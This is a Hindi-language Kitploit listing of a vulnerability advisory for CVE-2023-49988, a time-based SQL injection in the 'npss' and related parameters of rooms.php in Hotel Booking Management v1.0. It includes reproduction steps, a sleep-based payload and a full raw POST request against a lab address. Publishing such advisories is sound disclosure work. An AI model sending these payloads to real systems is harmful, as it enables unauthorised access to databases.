Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-49988 — होटल बुकिंग प्रबंधन v1.0 - "npss" पैरामीटर में SQL Injection कमजोरी rooms.php पर | Kitploit
उपकरण/GitHubGitHub/geraldoalcantara/cve-2023-49988
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubgeraldoalcantara/cve-2023-49988

CVE-2023-49988

होटल बुकिंग प्रबंधन v1.0 - "npss" पैरामीटर में SQL Injection कमजोरी rooms.php पर

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-49988

Hotel Booking Management v1.0 - SQL Injection Vulnerability in the "npss" parameter at rooms.php

विवरण: Hotel Booking Management के संस्करण 1 में एक SQL Injection भेद्यता मौजूद है। एक दुर्भावनापूर्ण हमलावर, आवास विकल्पों की कीमतों और छूटों को संपादित करते समय कमजोर पैरामीटर npss, dpss, npsd, dpsd, npds, dpds, npdd, dpdd, npdst, या dpdst के माध्यम से MySQL डेटाबेस को SQL कमांड जारी कर सकता है।

भेद्य उत्पाद संस्करण: Hotel Booking Management v1.0 CVE लेखक: Geraldo Alcântara दिनांक: 28/11/2023 पुष्टि तिथि: 19/12/2023 CVE: CVE-2023-49988 परीक्षण किया गया: Windows

पुनरुत्पादन के चरण:

इस भेद्यता का शोषण करने के लिए, एक हमलावर /HotelBookingManagement-main/rooms.php पर नेविगेट कर सकता है। आवास विकल्पों की कीमतों और छूटों को संशोधित करते समय npss, dpss, npsd, dpsd, npds, dpds, npdd, dpdd, npdst, या dpdst जैसे पैरामीटर में SQL पेलोड इंजेक्ट करके, हमलावर सिस्टम से समझौता कर सकता है। पेलोड: (select*from(select(sleep(5)))a)

अनुरोध:

root@kitploit:~
POST /HotelBookingManagement-main/rooms.php HTTP/1.1
Host: 192.168.68.148
Content-Length: 127
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/HotelBookingManagement-main/rooms.php
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=aih2rvevdrpegiqt8nlstav7am
Connection: close

npss=(select*from(select(sleep(5)))a)&dpss=2&npsd=800&dpsd=2&npds=1100&dpds=3&npdd=1500&dpdd=4&npdst=2000&dpdst=13&updateRooms=

खोजकर्ता/श्रेय: Geraldo Alcântara

टूल डाउनलोड करें